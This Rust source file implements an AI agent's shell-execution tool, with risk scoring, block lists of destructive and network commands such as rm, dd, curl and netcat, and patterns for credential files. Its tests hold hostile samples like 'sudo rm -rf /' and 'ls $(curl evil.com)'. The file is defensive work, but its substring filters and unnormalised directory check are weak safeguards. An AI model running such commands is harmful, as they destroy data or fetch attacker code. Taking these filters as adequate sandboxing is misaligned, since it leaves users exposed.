code_mesh_core/tool/
bash.rs

1//! Enhanced Bash tool implementation
2//! Features secure process execution, timeout handling, cross-platform support, and command validation
3
4use async_trait::async_trait;
5use serde::Deserialize;
6use serde_json::{json, Value};
7use std::collections::HashMap;
8use std::path::{Path, PathBuf};
9use std::process::Stdio;
10use tokio::process::Command;
11use tokio::time::{timeout, Duration};
12use uuid::Uuid;
13use chrono::Utc;
14use cfg_if::cfg_if;
15
16use super::{Tool, ToolContext, ToolResult, ToolError};
17use super::permission::{RiskLevel, create_permission_request};
18
19/// Tool for executing bash/shell commands
20pub struct BashTool;
21
22#[derive(Debug, Deserialize)]
23struct BashParams {
24    command: String,
25    #[serde(default = "default_timeout")]
26    timeout: Option<u64>,
27    #[serde(default)]
28    description: Option<String>,
29    #[serde(default)]
30    environment: Option<HashMap<String, String>>,
31    #[serde(default)]
32    working_directory: Option<String>,
33}
34
35fn default_timeout() -> Option<u64> {
36    Some(120000) // 2 minutes default
37}
38
39const MAX_TIMEOUT: u64 = 600_000; // 10 minutes max
40const MAX_OUTPUT_LENGTH: usize = 30_000;
41
42// Dangerous commands that should be blocked or require high permissions
43const DANGEROUS_COMMANDS: &[&str] = &[
44    "rm", "rmdir", "del", "format", "fdisk", "mkfs", "dd", "shutdown", 
45    "reboot", "halt", "init", "kill", "killall", "pkill", "sudo", "su", 
46    "passwd", "chown", "chmod", "mount", "umount", "systemctl", "service",
47    "iptables", "ufw", "firewall-cmd"
48];
49
50// Commands that modify system state (medium risk)
51const SYSTEM_COMMANDS: &[&str] = &[
52    "apt", "yum", "dnf", "pacman", "brew", "pip", "npm", "yarn", "cargo",
53    "git", "docker", "kubectl", "terraform", "ansible"
54];
55
56#[async_trait]
57impl Tool for BashTool {
58    fn id(&self) -> &str {
59        "bash"
60    }
61    
62    fn description(&self) -> &str {
63        "Execute shell commands with security controls and timeout handling"
64    }
65    
66    fn parameters_schema(&self) -> Value {
67        json!({
68            "type": "object",
69            "properties": {
70                "command": {
71                    "type": "string",
72                    "description": "The command to execute"
73                },
74                "timeout": {
75                    "type": "number",
76                    "description": "Optional timeout in milliseconds (max 600000ms / 10 minutes)",
77                    "minimum": 1000,
78                    "maximum": 600000
79                },
80                "description": {
81                    "type": "string",
82                    "description": "Clear, concise description of what this command does in 5-10 words"
83                },
84                "environment": {
85                    "type": "object",
86                    "description": "Additional environment variables",
87                    "additionalProperties": {
88                        "type": "string"
89                    }
90                },
91                "workingDirectory": {
92                    "type": "string",
93                    "description": "Working directory for the command (relative to session working directory)"
94                }
95            },
96            "required": ["command"]
97        })
98    }
99    
100    async fn execute(
101        &self,
102        args: Value,
103        ctx: ToolContext,
104    ) -> Result<ToolResult, ToolError> {
105        let params: BashParams = serde_json::from_value(args)
106            .map_err(|e| ToolError::InvalidParameters(e.to_string()))?;
107        
108        // Validate and analyze command
109        let risk_assessment = self.assess_command_risk(&params.command);
110        
111        // Security validation
112        self.validate_command_security(&params.command, &ctx)?;
113        
114        // Handle timeout validation
115        let timeout_ms = params.timeout.unwrap_or(120_000).min(MAX_TIMEOUT);
116        
117        // Determine working directory
118        let working_dir = if let Some(wd) = &params.working_directory {
119            let requested_dir = if PathBuf::from(wd).is_absolute() {
120                PathBuf::from(wd)
121            } else {
122                ctx.working_directory.join(wd)
123            };
124            
125            // Security check: ensure it's within the session working directory
126            if !requested_dir.starts_with(&ctx.working_directory) {
127                return Err(ToolError::PermissionDenied(
128                    "Working directory must be within session directory".to_string()
129                ));
130            }
131            
132            requested_dir
133        } else {
134            ctx.working_directory.clone()
135        };
136        
137        // Create permission request based on risk level
138        if risk_assessment.requires_permission {
139            let permission_request = create_permission_request(
140                Uuid::new_v4().to_string(),
141                ctx.session_id.clone(),
142                format!("Execute command: {}", 
143                    if params.command.len() > 50 { 
144                        format!("{}...", &params.command[..50]) 
145                    } else { 
146                        params.command.clone() 
147                    }
148                ),
149                risk_assessment.risk_level,
150                json!({
151                    "command": params.command,
152                    "description": params.description,
153                    "working_directory": working_dir.to_string_lossy(),
154                    "risk_factors": risk_assessment.risk_factors,
155                }),
156            );
157            
158            // In a full implementation, this would trigger permission checking
159            // For now, we'll allow medium risk commands but block high/critical
160            if matches!(risk_assessment.risk_level, RiskLevel::High | RiskLevel::Critical) {
161                return Err(ToolError::PermissionDenied(format!(
162                    "Command blocked due to security policy: {}",
163                    risk_assessment.risk_factors.join(", ")
164                )));
165            }
166        }
167        
168        // Execute the command
169        let execution_result = self.execute_command(
170            &params.command,
171            &working_dir,
172            timeout_ms,
173            &params.environment,
174            &ctx,
175        ).await?;
176        
177        // Process results
178        let output = self.format_output(&execution_result)?;
179        
180        // Calculate relative working directory for display
181        let relative_wd = working_dir
182            .strip_prefix(&ctx.working_directory)
183            .unwrap_or(&working_dir)
184            .to_string_lossy()
185            .to_string();
186        
187        let metadata = json!({
188            "command": params.command,
189            "description": params.description,
190            "exit_code": execution_result.exit_code,
191            "working_directory": relative_wd,
192            "timeout_ms": timeout_ms,
193            "stdout_bytes": execution_result.stdout.len(),
194            "stderr_bytes": execution_result.stderr.len(),
195            "truncated": execution_result.truncated,
196            "execution_time_ms": execution_result.execution_time_ms,
197            "risk_assessment": risk_assessment,
198            "timestamp": Utc::now().to_rfc3339(),
199        });
200        
201        // Check if command failed
202        if execution_result.exit_code != 0 {
203            return Err(ToolError::ExecutionFailed(format!(
204                "Command exited with code {}: {}",
205                execution_result.exit_code,
206                output
207            )));
208        }
209        
210        Ok(ToolResult {
211            title: params.description.unwrap_or_else(|| {
212                if params.command.len() > 50 {
213                    format!("{}...", &params.command[..50])
214                } else {
215                    params.command.clone()
216                }
217            }),
218            metadata,
219            output,
220        })
221    }
222}
223
224#[derive(Debug, Clone, serde::Serialize)]
225struct CommandRiskAssessment {
226    risk_level: RiskLevel,
227    requires_permission: bool,
228    risk_factors: Vec<String>,
229}
230
231#[derive(Debug)]
232struct CommandExecutionResult {
233    stdout: String,
234    stderr: String,
235    exit_code: i32,
236    truncated: bool,
237    execution_time_ms: u128,
238}
239
240impl BashTool {
241    /// Assess the risk level of a command
242    fn assess_command_risk(&self, command: &str) -> CommandRiskAssessment {
243        let mut risk_factors = Vec::new();
244        let mut risk_level = RiskLevel::Low;
245        let mut requires_permission = false;
246        
247        let command_lower = command.to_lowercase();
248        let command_parts: Vec<&str> = command.split_whitespace().collect();
249        let base_command = command_parts.first().unwrap_or(&"").trim_start_matches("sudo ");
250        
251        // Check for dangerous commands
252        if DANGEROUS_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.ends_with(cmd)) {
253            risk_level = RiskLevel::Critical;
254            requires_permission = true;
255            risk_factors.push("Potentially destructive command".to_string());
256        }
257        
258        // Check for system modification commands
259        if SYSTEM_COMMANDS.iter().any(|&cmd| base_command == cmd || base_command.starts_with(cmd)) {
260            risk_level = risk_level.max(RiskLevel::Medium);
261            requires_permission = true;
262            risk_factors.push("System modification command".to_string());
263        }
264        
265        // Check for privilege escalation
266        if command_lower.contains("sudo") || command_lower.contains("su ") {
267            risk_level = RiskLevel::Critical;
268            requires_permission = true;
269            risk_factors.push("Privilege escalation detected".to_string());
270        }
271        
272        // Check for network operations
273        if command_lower.contains("curl") || command_lower.contains("wget") || 
274           command_lower.contains("nc ") || command_lower.contains("netcat") {
275            risk_level = risk_level.max(RiskLevel::Medium);
276            requires_permission = true;
277            risk_factors.push("Network operation".to_string());
278        }
279        
280        // Check for file operations with wildcards
281        if (command_lower.contains("rm ") || command_lower.contains("del ")) && 
282           (command_lower.contains("*") || command_lower.contains("?")) {
283            risk_level = RiskLevel::High;
284            requires_permission = true;
285            risk_factors.push("Bulk file deletion".to_string());
286        }
287        
288        // Check for shell operators that could be dangerous
289        if command.contains("&&") || command.contains("||") || command.contains(";") || 
290           command.contains("|") || command.contains(">") || command.contains(">>") {
291            risk_level = risk_level.max(RiskLevel::Medium);
292            risk_factors.push("Complex shell operation".to_string());
293        }
294        
295        CommandRiskAssessment {
296            risk_level,
297            requires_permission,
298            risk_factors,
299        }
300    }
301    
302    /// Validate command security
303    fn validate_command_security(&self, command: &str, _ctx: &ToolContext) -> Result<(), ToolError> {
304        // Block obviously malicious patterns
305        let malicious_patterns = [
306            "; rm -rf", "| rm -rf", "&& rm -rf", "|| rm -rf",
307            "$(curl", "$(wget", "`curl", "`wget",
308            "/etc/passwd", "/etc/shadow", 
309            "format c:", "del /f /s /q",
310        ];
311        
312        let command_lower = command.to_lowercase();
313        for pattern in &malicious_patterns {
314            if command_lower.contains(pattern) {
315                return Err(ToolError::PermissionDenied(format!(
316                    "Command contains potentially malicious pattern: {}",
317                    pattern
318                )));
319            }
320        }
321        
322        // Check command length
323        if command.len() > 4096 {
324            return Err(ToolError::InvalidParameters(
325                "Command too long (>4096 characters)".to_string()
326            ));
327        }
328        
329        Ok(())
330    }
331    
332    /// Execute the command with proper platform handling
333    async fn execute_command(
334        &self,
335        command: &str,
336        working_dir: &Path,
337        timeout_ms: u64,
338        environment: &Option<HashMap<String, String>>,
339        ctx: &ToolContext,
340    ) -> Result<CommandExecutionResult, ToolError> {
341        let start_time = std::time::Instant::now();
342        
343        // Build command based on platform
344        let mut cmd = self.create_platform_command(command);
345        
346        // Set working directory
347        cmd.current_dir(working_dir);
348        
349        // Set up stdio
350        cmd.stdout(Stdio::piped())
351           .stderr(Stdio::piped())
352           .stdin(Stdio::null());
353        
354        // Set environment variables
355        cmd.env("TERM", "xterm-256color");
356        cmd.env("FORCE_COLOR", "0"); // Disable colors in output
357        cmd.env("NO_COLOR", "1");
358        
359        if let Some(env) = environment {
360            for (key, value) in env {
361                // Validate environment variable names for security
362                if key.chars().all(|c| c.is_ascii_alphanumeric() || c == '_') {
363                    cmd.env(key, value);
364                }
365            }
366        }
367        
368        // Execute with timeout
369        let output = match timeout(Duration::from_millis(timeout_ms), cmd.output()).await {
370            Ok(Ok(output)) => output,
371            Ok(Err(e)) => {
372                return Err(ToolError::ExecutionFailed(format!("Command failed to start: {}", e)));
373            }
374            Err(_) => {
375                return Err(ToolError::ExecutionFailed(format!(
376                    "Command timed out after {} ms",
377                    timeout_ms
378                )));
379            }
380        };
381        
382        // Check abort signal
383        if *ctx.abort_signal.borrow() {
384            return Err(ToolError::Aborted);
385        }
386        
387        let execution_time = start_time.elapsed().as_millis();
388        
389        // Convert output to strings
390        let stdout = String::from_utf8_lossy(&output.stdout);
391        let stderr = String::from_utf8_lossy(&output.stderr);
392        
393        // Check if output needs truncation
394        let combined_length = stdout.len() + stderr.len();
395        let truncated = combined_length > MAX_OUTPUT_LENGTH;
396        
397        let (final_stdout, final_stderr) = if truncated {
398            let stdout_limit = MAX_OUTPUT_LENGTH * 3 / 4; // 75% for stdout
399            let stderr_limit = MAX_OUTPUT_LENGTH - stdout_limit;
400            
401            let truncated_stdout = if stdout.len() > stdout_limit {
402                format!("{}... (truncated)", &stdout[..stdout_limit])
403            } else {
404                stdout.to_string()
405            };
406            
407            let truncated_stderr = if stderr.len() > stderr_limit {
408                format!("{}... (truncated)", &stderr[..stderr_limit])
409            } else {
410                stderr.to_string()
411            };
412            
413            (truncated_stdout, truncated_stderr)
414        } else {
415            (stdout.to_string(), stderr.to_string())
416        };
417        
418        Ok(CommandExecutionResult {
419            stdout: final_stdout,
420            stderr: final_stderr,
421            exit_code: output.status.code().unwrap_or(-1),
422            truncated,
423            execution_time_ms: execution_time,
424        })
425    }
426    
427    /// Create platform-appropriate command
428    fn create_platform_command(&self, command: &str) -> Command {
429        cfg_if! {
430            if #[cfg(target_os = "windows")] {
431                let mut cmd = Command::new("cmd");
432                cmd.args(["/C", command]);
433                cmd
434            } else {
435                let mut cmd = Command::new("bash");
436                cmd.args(["-c", command]);
437                cmd
438            }
439        }
440    }
441    
442    /// Format the execution result into a readable output
443    fn format_output(&self, result: &CommandExecutionResult) -> Result<String, ToolError> {
444        let mut output_parts = Vec::new();
445        
446        if !result.stdout.is_empty() {
447            output_parts.push(format!("<stdout>\n{}\n</stdout>", result.stdout));
448        }
449        
450        if !result.stderr.is_empty() {
451            output_parts.push(format!("<stderr>\n{}\n</stderr>", result.stderr));
452        }
453        
454        if output_parts.is_empty() {
455            output_parts.push("(no output)".to_string());
456        }
457        
458        if result.truncated {
459            output_parts.push("\n(Output truncated due to length)".to_string());
460        }
461        
462        Ok(output_parts.join("\n"))
463    }
464}
465
466impl RiskLevel {
467    fn max(self, other: RiskLevel) -> RiskLevel {
468        match (self, other) {
469            (RiskLevel::Critical, _) | (_, RiskLevel::Critical) => RiskLevel::Critical,
470            (RiskLevel::High, _) | (_, RiskLevel::High) => RiskLevel::High,
471            (RiskLevel::Medium, _) | (_, RiskLevel::Medium) => RiskLevel::Medium,
472            (RiskLevel::Low, RiskLevel::Low) => RiskLevel::Low,
473        }
474    }
475}
476
477#[cfg(feature = "wasm")]
478mod wasm_impl {
479    use super::*;
480    
481    impl BashTool {
482        async fn execute_command(
483            &self,
484            _command: &str,
485            _working_dir: &Path,
486            _timeout_ms: u64,
487            _environment: &Option<HashMap<String, String>>,
488            _ctx: &ToolContext,
489        ) -> Result<CommandExecutionResult, ToolError> {
490            Err(ToolError::ExecutionFailed(
491                "Command execution not supported in WASM environment".to_string()
492            ))
493        }
494    }
495}
496
497#[cfg(test)]
498mod tests {
499    use super::*;
500    
501    #[test]
502    fn test_risk_assessment() {
503        let tool = BashTool;
504        
505        // Low risk command
506        let assessment = tool.assess_command_risk("ls -la");
507        assert_eq!(assessment.risk_level, RiskLevel::Low);
508        assert!(!assessment.requires_permission);
509        
510        // Medium risk command
511        let assessment = tool.assess_command_risk("git clone https://github.com/user/repo");
512        assert_eq!(assessment.risk_level, RiskLevel::Medium);
513        assert!(assessment.requires_permission);
514        
515        // High risk command
516        let assessment = tool.assess_command_risk("rm -rf *.log");
517        assert_eq!(assessment.risk_level, RiskLevel::High);
518        assert!(assessment.requires_permission);
519        
520        // Critical risk command
521        let assessment = tool.assess_command_risk("sudo rm -rf /");
522        assert_eq!(assessment.risk_level, RiskLevel::Critical);
523        assert!(assessment.requires_permission);
524    }
525    
526    #[test]
527    fn test_security_validation() {
528        let tool = BashTool;
529        let ctx = ToolContext {
530            session_id: "test".to_string(),
531            message_id: "test".to_string(),
532            abort_signal: tokio::sync::watch::channel(false).1,
533            working_directory: PathBuf::from("/tmp"),
534        };
535        
536        // Safe command should pass
537        assert!(tool.validate_command_security("ls -la", &ctx).is_ok());
538        
539        // Malicious pattern should fail
540        assert!(tool.validate_command_security("ls; rm -rf /", &ctx).is_err());
541        
542        // Command injection should fail
543        assert!(tool.validate_command_security("ls $(curl evil.com)", &ctx).is_err());
544    }
545}